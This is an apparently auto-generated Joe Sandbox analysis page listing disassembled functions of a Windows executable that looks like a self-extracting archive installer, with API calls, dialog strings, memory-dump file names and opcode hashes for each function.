Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
Instruction ID: e2a553e11ccdc75bfd9e09a2a759721d75f2ab5807daf84bd34e7484f2f3f46e
Opcode Fuzzy Hash: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
Instruction Fuzzy Hash: 47B012B011210106DE1C03343C040973150274070BBC049BDB402C0211FB2EC024500F

Function 00418ED0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00418ED8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
Instruction ID: 93b00212a99b6a082cadc79a1e30e4f7e8762bb5dbef7d3919aab0975435a3d9
Opcode Fuzzy Hash: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
Instruction Fuzzy Hash: DCB012A890118102DA0403343C04093317277D070B7C4C8F9A401C0215FF3DC038600E

Function 00418EB0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0041269C), ref: 00418EBC

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
Instruction ID: 0e3cf457c684582be7836cc479f2286583ff41d20b64db86ad3597c1f4fbeca2
Opcode Fuzzy Hash: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
Instruction Fuzzy Hash: D2B0127074230022ED3807110D05B9716001700702F10801C3205A40C08B9DA404450C

Function 00418E80 Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00418E81

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
Instruction ID: 274342a45a8081fe27f7bdb5d6c884acc69a6842209db99ac87ec0640da087f0
Opcode Fuzzy Hash: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
Instruction Fuzzy Hash:

Function 00418EF1 Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00418EF1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
Instruction ID: 1f3b28ff6c5a90f3ca056b026900e47eaa4da2a5162f9c1f96bfe5ec7c3f15e6
Opcode Fuzzy Hash: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
Instruction Fuzzy Hash:

Non-executed Functions

Function 00405811 Relevance: 40.4, APIs: 3, Strings: 20, Instructions: 185stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041BACC,?,0041E138,?,?,004066DE,?,00000000), ref: 004058D2
_wtol.MSVCRT ref: 004059A2
_wtol.MSVCRT ref: 004059BB

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46

Part of subcall function 004056CB: _wtol.MSVCRT ref: 00405668

Strings

PasswordTitle, xrefs: 00405A04
ExtractPathTitle, xrefs: 004059C5
CancelPrompt, xrefs: 004059EF
ErrorTitle, xrefs: 0040587F
ExtractDialogWidth, xrefs: 00405988
Progress, xrefs: 004058BE
PasswordText, xrefs: 00405A19
MiscFlags, xrefs: 0040594A
OverwriteMode, xrefs: 0040590F
WarningTitle, xrefs: 00405894
ExtractDialogText, xrefs: 00405977
GUIMode, xrefs: 004058E8
ExtractPathWidth, xrefs: 004059AC
Title, xrefs: 00405819
ExtractTitle, xrefs: 004058A9
ExtractCancelText, xrefs: 0040596B
VolumeNameStyle, xrefs: 00405A36
GUIFlags, xrefs: 00405928
\A, xrefs: 00405829
ExtractPathText, xrefs: 004059DA

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ErrorLast$??2@_wtol$??3@EnvironmentVariablelstrcmpimemcpy$InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$VolumeNameStyle$WarningTitle$\A
API String ID: 730802180-3281108388
Opcode ID: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
Instruction ID: b5e5bdf9c584833b01f0c934a091df39086854388a50827319ec31f510801f87
Opcode Fuzzy Hash: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
Instruction Fuzzy Hash: 68514DB5B01A0087FB18EB7799115AB66DADF84358704C43B9815E73D2FF3C89818E5D

Function 00403DC8 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 148stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
wsprintfW.USER32 ref: 00403E28
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
GetLastError.KERNEL32 ref: 00403E42
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
GetLastError.KERNEL32 ref: 00403E77
lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403EBA
SetLastError.KERNEL32(?), ref: 00403EC3
lstrlenA.KERNEL32(0041B930), ref: 00403EF9
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46
_wtol.MSVCRT ref: 00403F57
MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77

Strings

HA, xrefs: 00403DE2
SfxString%d, xrefs: 00403E22

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: HA$SfxString%d
API String ID: 2117570002-4175495882
Opcode ID: bc30f0ea7da84d81cbdf466a9fb53cb914f331c4cfcb830f3d13f4ef1284af07
Instruction ID: 826b4a115549d6cfa4e8bf1551a429c7e3dac2c77e478b686eb9c33c06818d2c
Opcode Fuzzy Hash: bc30f0ea7da84d81cbdf466a9fb53cb914f331c4cfcb830f3d13f4ef1284af07
Instruction Fuzzy Hash: E0518F75A00205BFDB209F65DD499ABBBBCEF44301B10853BE906E6290E738AE54CB59

Function 004048CC Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 004048ED
SHGetSpecialFolderPathW.SHELL32(00000000,?,-0000001A,00000000), ref: 0040499D
_wtol.MSVCRT ref: 00404A56
CoCreateInstance.OLE32(0041C85C,00000000,00000001,0041C80C,?,.lnk,?,0000005C), ref: 00404AF4
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00404B8E
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00404B96
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00404B9E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00404BA6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00404BAE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404BB6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404BBE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00404BC6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?), ref: 00404BCE

Strings

.lnk, xrefs: 00404AD3

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
Instruction ID: 83a2d305c882314969b83a1368edb940d706b9a9cbb686142cff4198cf257129
Opcode Fuzzy Hash: 8f4be62236c205874ad8fe4d42cfdaf836737bed6dde23ea050fd9b739d62d60
Instruction Fuzzy Hash: 8891B375900109ABCF04EFA5CC959EEB779BF84304B60457EF502B71A1EB39AE85CB18

Function 004142CC Relevance: 24.7, APIs: 16, Instructions: 696COMMON

Download Yara Rule

APIs

Part of subcall function 00416CB7: _CxxThrowException.MSVCRT(?,0041C9D4), ref: 00416CFF

??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 00414372

Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT(?,00000000,00414388,?,00000000), ref: 0041418F
Part of subcall function 00414189: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00414388,?,00000000), ref: 00414197

??2@YAPAXI@Z.MSVCRT(00000084,00000000,?,00000000), ref: 00414409
??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00414616
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00414648
SysFreeString.OLEAUT32(?), ref: 00414651
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0041475D
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00414765
??2@YAPAXI@Z.MSVCRT(00000030,?,00000000), ref: 004147AB
SysFreeString.OLEAUT32(?), ref: 004147EA

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@$FreeString$ExceptionThrow
String ID:
API String ID: 3050852170-0
Opcode ID: 0dc503826e79d450dff9e6847ae3b1e9803551f045c19f6bbaade4de96a530dc
Instruction ID: 63c1d7170cb7f9ccbcc5f7ed3098d04a866bf1aea97f2543f5bdc1a1635b749d
Opcode Fuzzy Hash: 0dc503826e79d450dff9e6847ae3b1e9803551f045c19f6bbaade4de96a530dc
Instruction Fuzzy Hash: 82525671A00209DFCB14DF64C894AEE7BB5BF88318F25415AF8169B351DB39ED81CB98

Function 004039F0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
SizeofResource.KERNEL32(?,00000000), ref: 00403A49
LoadResource.KERNEL32(?,00000000), ref: 00403A55
LockResource.KERNEL32(00000000), ref: 00403A60
GetProcAddress.KERNEL32(SetProcessPreferredUILanguages), ref: 00403A8C
wsprintfW.USER32 ref: 00403AA6
GetProcAddress.KERNEL32(SetThreadPreferredUILanguages), ref: 00403ABE

Strings

SetThreadPreferredUILanguages, xrefs: 00403AB3
SetProcessPreferredUILanguages, xrefs: 00403A77
%04X%c%04X%c, xrefs: 00403AA0

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Resource$AddressFindProc$HandleLoadLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages
API String ID: 2090077119-3413765421
Opcode ID: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
Instruction ID: ed0741534da578f5e66d3de38586fa322f1091544de9e69cad048277579e345e
Opcode Fuzzy Hash: 8f248b3f3ccdae2e627c25948350bafec117c70763480a7fd32ce54566ccef8a
Instruction Fuzzy Hash: C2214175A01308BBDB119FA5DD45BAE7FBCEB04701F108036FA40A22A1E7B59E50DB59

Function 0040340F Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

Part of subcall function 00411CA3: memcpy.MSVCRT(?,00000000,00000002,00000000,?,?,00000000,004050A9,?,0041ADC8,?,?,?,00000000), ref: 00411CD0

FindFirstFileW.KERNEL32(?,?,0041ABCC,?,00000000,?,00000000), ref: 0040343D
lstrcmpW.KERNEL32(?,0041ABC8,?,0000005C,?), ref: 00403492
lstrcmpW.KERNEL32(?,0041ABC0), ref: 004034A4
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?), ref: 004034B9
DeleteFileW.KERNEL32(?), ref: 004034C2
FindNextFileW.KERNEL32(?,00000010), ref: 004034D6
FindClose.KERNEL32(?), ref: 004034E7
SetCurrentDirectoryW.KERNEL32 ref: 004034F3
SetFileAttributesW.KERNEL32(?,00000000), ref: 004034FC
RemoveDirectoryW.KERNEL32(?), ref: 00403503
??3@YAXPAX@Z.MSVCRT(?), ref: 00403510

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

??3@YAXPAX@Z.MSVCRT(?), ref: 0040351D

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: File$??3@Findmemcpy$AttributesDirectorylstrcmp$??2@CloseCurrentDeleteFirstNextRemove
String ID:
API String ID: 1254520193-0
Opcode ID: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
Instruction ID: 184ccade124785ef3e2e24a1a723902e2d1148a2b40179e28e9aacba309f937e
Opcode Fuzzy Hash: 9b31627a932f6071aa4177330747ff234158f9032b054607de35a00c98215738
Instruction Fuzzy Hash: BC31AE31A05109BADB12AFB1ED49FEE7B7CAF00315F1041B7A512B11E1EB78AF50CA18

Function 0040976C Relevance: 16.6, APIs: 11, Instructions: 94stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040978F
GetLastError.KERNEL32 ref: 004097A0
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00920F20), ref: 004097C8
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00920F20), ref: 004097DD
lstrlenW.KERNEL32(?), ref: 004097F0
lstrlenW.KERNEL32(?), ref: 004097F7
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040980C
lstrcpyW.KERNEL32(00000000,?), ref: 00409822
lstrcpyW.KERNEL32(-00000002,?), ref: 00409834
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040983E
LocalFree.KERNEL32(?), ref: 00409847

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

